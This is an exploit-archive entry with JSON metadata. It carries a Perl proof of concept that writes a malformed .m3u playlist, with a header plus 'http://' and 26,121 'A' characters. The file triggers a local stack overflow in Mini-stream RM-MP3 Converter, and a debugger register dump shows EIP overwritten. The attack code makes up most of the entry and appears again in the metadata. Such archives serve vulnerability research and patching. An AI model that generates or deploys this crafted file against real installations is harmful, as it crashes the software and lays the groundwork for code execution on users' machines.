ID 1337DAY-ID-6815
Type zdt
Reporter Cyber-Zone
Modified 2009-04-13T00:00:00
Description
Exploit for unknown platform in category dos / poc
=================================================================
Mini-stream RM-MP3 Converter (.M3U File) Local Stack Overflow PoC
=================================================================
#!/usr/bin/perl
#
#
# ************************************************************************
# * Mini-stream RM-MP3 Converter (.M3U File) Local Stack Overflow POC *
# ************************************************************************
#
# Found By : Cyber-Zone (ABDELKHALEK)
# Greetz : Hussin X , Jiko (my brother), ZoRLu , Nabilx , Mag!c ompo , Stack ... all mgharba HaCkers and Sec-r1z.com
#
#
# Olly registers
#EAX 00000001
#ECX 41414141
#EDX 00D20000
#EBX 00333ED8 ASCII "C:\Documents and Settings\Administrateur\Bureau\KHAL.m3u"
#ESP 000F6C90
#EBP 000FBFB4
#ESI 77C2FCE0 msvcrt.77C2FCE0
#EDI 00006619
#EIP 41414141
#
my $Header = "#EXTM3U\n";
my $ex="http://"."A" x 26121;# just Poc tested under MS windows SP2 Fr
open(MYFILE,'>>KHAL.m3u');
print MYFILE $Header.$ex;
close(MYFILE);
# 0day.today [2018-01-10] #
{"id": "1337DAY-ID-6815", "lastseen": "2018-01-10T13:13:15", "viewCount": 4, "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 0.4, "vector": "NONE", "modified": "2018-01-10T13:13:15", "rev": 2}, "dependencies": {"references": [], "modified": "2018-01-10T13:13:15", "rev": 2}, "vulnersScore": 0.4}, "type": "zdt", "sourceHref": "https://0day.today/exploit/6815", "description": "Exploit for unknown platform in category dos / poc", "title": "Mini-stream RM-MP3 Converter (.M3U File) Local Stack Overflow PoC", "cvelist": [], "sourceData": "=================================================================\r\nMini-stream RM-MP3 Converter (.M3U File) Local Stack Overflow PoC\r\n=================================================================\r\n\r\n\r\n\r\n#!/usr/bin/perl\r\n#\r\n#\r\n# ************************************************************************\r\n# * Mini-stream RM-MP3 Converter (.M3U File) Local Stack Overflow POC *\r\n# ************************************************************************\r\n#\r\n# Found By : Cyber-Zone (ABDELKHALEK)\r\n# Greetz : Hussin X , Jiko (my brother), ZoRLu , Nabilx , Mag!c ompo , Stack ... all mgharba HaCkers and Sec-r1z.com\r\n#\r\n#\r\n# Olly registers\r\n#EAX 00000001\r\n#ECX 41414141\r\n#EDX 00D20000\r\n#EBX 00333ED8 ASCII \"C:\\Documents and Settings\\Administrateur\\Bureau\\KHAL.m3u\"\r\n#ESP 000F6C90\r\n#EBP 000FBFB4\r\n#ESI 77C2FCE0 msvcrt.77C2FCE0\r\n#EDI 00006619\r\n#EIP 41414141\r\n#\r\nmy $Header = \"#EXTM3U\\n\";\r\n\r\nmy $ex=\"http://\".\"A\" x 26121;# just Poc tested under MS windows SP2 Fr\r\n\r\nopen(MYFILE,'>>KHAL.m3u');\r\n\r\nprint MYFILE $Header.$ex;\r\n\r\nclose(MYFILE);\r\n\r\n\r\n\n# 0day.today [2018-01-10] #", "published": "2009-04-13T00:00:00", "references": [], "reporter": "Cyber-Zone", "modified": "2009-04-13T00:00:00", "href": "https://0day.today/exploit/description/6815"}
{}